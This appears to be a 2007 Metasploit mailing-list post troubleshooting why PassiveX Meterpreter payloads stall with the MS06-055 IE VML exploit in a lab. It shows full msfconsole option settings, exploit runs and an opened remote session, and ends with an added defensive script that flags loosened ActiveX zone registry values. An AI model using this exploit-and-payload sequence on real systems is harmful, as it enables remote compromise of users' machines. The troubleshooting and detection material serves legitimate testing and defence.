[framework] PassiveX-based payloads and MS06-055
Angelo Dell'Aera
buffer at softmedia.info
Tue Mar 13 06:35:27 CDT 2007
While doing a few tests I noticed a strange behavior while trying
to exploit the VML processing vulnerability in IE referenced by the
Microsoft Bulletin MS06-055 on Windows XP SP1.
The first thing I tried was using Meterpreter as shown below.
msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest          no        The URI to use for this exploit (default is random)

Payload options:

   Name      Current Setting                                Required  Description
   ----      ---------------                                --------  -----------
   DLL       /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC  seh                                            yes       Exit technique: seh, thread, process
   LPORT     4444                                           yes       The local port

Exploit target:

   Id  Name
   --  ----
   0   Windows NT 4.0 -> Windows 2003 SP1

msf exploit(ms06_055_vml_method) > exploit
[*] Started bind handler
[*] Using URL: http://192.168.33.130:8080/pentest
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 2 opened (192.168.33.130:39557 -> 192.168.33.199:4444)
... and everything works fine.
When I try using PassiveX Meterpreter instead...
msf exploit(ms06_055_vml_method) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf exploit(ms06_055_vml_method) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  192.168.33.130   yes       The local host to listen on.
   SRVPORT  8080             yes       The local port to listen on.
   URIPATH  pentest3         no        The URI to use for this exploit (default is random)

Payload options:

   Name       Current Setting                                Required  Description
   ----       ---------------                                --------  -----------
   DLL        /home/buffer/msf3/data/meterpreter/metsrv.dll  yes       The local path to the DLL to upload
   EXITFUNC   seh                                            yes       Exit technique: seh, thread, process
   PXAXCLSID  B3AC7307-FEAE-4e43-B2D6-161E68ABA838           yes       ActiveX CLSID
   PXAXDLL    /home/buffer/msf3/data/passivex/passivex.dll   yes       ActiveX DLL to inject
   PXAXVER    -1,-1,-1,-1                                    yes       ActiveX DLL Version
   PXHOST     192.168.33.130                                 yes       The local HTTP listener hostname
   PXPORT     10000                                          yes       The local HTTP listener port
   PXURI      /OPrZwdoVOupJ0PB4rCdiaWXi1wIB5e9s              no        The URI root for requests

I see this behavior...

msf exploit(ms06_055_vml_method) > exploit
[*] PassiveX listener started.
[*] Using URL: http://192.168.33.130:8080/pentest3
[*] Server started.
[*] Exploit running as background job.
msf exploit(ms06_055_vml_method) >
[*] Sending PassiveX main page to client
and it stops here. I tried using other PassiveX-based payloads with
the same exploit but no luck... always the same result. Other
non-PassiveX-based payloads work instead.
I took a look at the registry and everything seems to work fine since

   Key:    HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
   Values: 1004, 1200, 1201, 1001

are changed to the value 0 as expected.
Regards,
--
Angelo Dell'Aera 'buffer'
Antifork Research, Inc. http://buffer.antifork.org
Metro Olografix
PGP information in e-mail header
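The registry footprint described in the post, looked at from the defender's side, as an added example that is not part of the original message or of Metasploit: the script parses a reg export of the Internet zone key and reports which of the four ActiveX URL actions the post names (1001, 1004, 1200, 1201) are set more permissively than Internet Explorer's Medium-level defaults. The default table and the action names are my assumption from the URLACTION_* constants, and the .reg text is constructed.

```python
import re

# IE URL-action values named in the post (URLACTION_* constants from urlmon.h)
# with the Internet-zone default each ships with at the "Medium" level
# (assumed here; policy values: 0 = allow, 1 = prompt, 3 = disallow).
URL_ACTIONS = {
    0x1001: ("Download signed ActiveX controls", 1),
    0x1004: ("Download unsigned ActiveX controls", 3),
    0x1200: ("Run ActiveX controls and plug-ins", 0),
    0x1201: ("Initialize and script ActiveX controls not marked as safe", 3),
}
URLPOLICY = {0: "allow", 1: "prompt", 3: "disallow"}
ZONE_KEY = (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion"
            r"\Internet Settings\Zones\3")

def parse_zone_values(reg_text, key=ZONE_KEY):
    """Return {action: dword} for the hex-named values under `key` in a .reg export."""
    values, in_key = {}, False
    for line in reg_text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            in_key = line[1:-1].lower() == key.lower()
            continue
        m = re.match(r'"([0-9A-Fa-f]+)"=dword:([0-9A-Fa-f]{8})$', line)
        if in_key and m:
            values[int(m.group(1), 16)] = int(m.group(2), 16)
    return values

def activex_findings(values):
    """List each of the four ActiveX actions set more permissively than its default."""
    findings = []
    for action, (name, default) in URL_ACTIONS.items():
        current = values.get(action, default)
        if current < default:  # allow (0) < prompt (1) < disallow (3)
            findings.append("%X %s: %s (default %s)" % (
                action, name, URLPOLICY.get(current, current), URLPOLICY[default]))
    return findings

# Constructed sample export of the Internet zone after the relaxation the
# post describes: the four values it names all set to 0.
SAMPLE_REG = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3]
"DisplayName"="Internet"
"1001"=dword:00000000
"1004"=dword:00000000
"1200"=dword:00000000
"1201"=dword:00000000
"""
```

Running activex_findings(parse_zone_values(SAMPLE_REG)) reports 1001, 1004 and 1201 as loosened to "allow"; 1200 is not reported because "Run ActiveX controls and plug-ins" is allowed in the Internet zone by default.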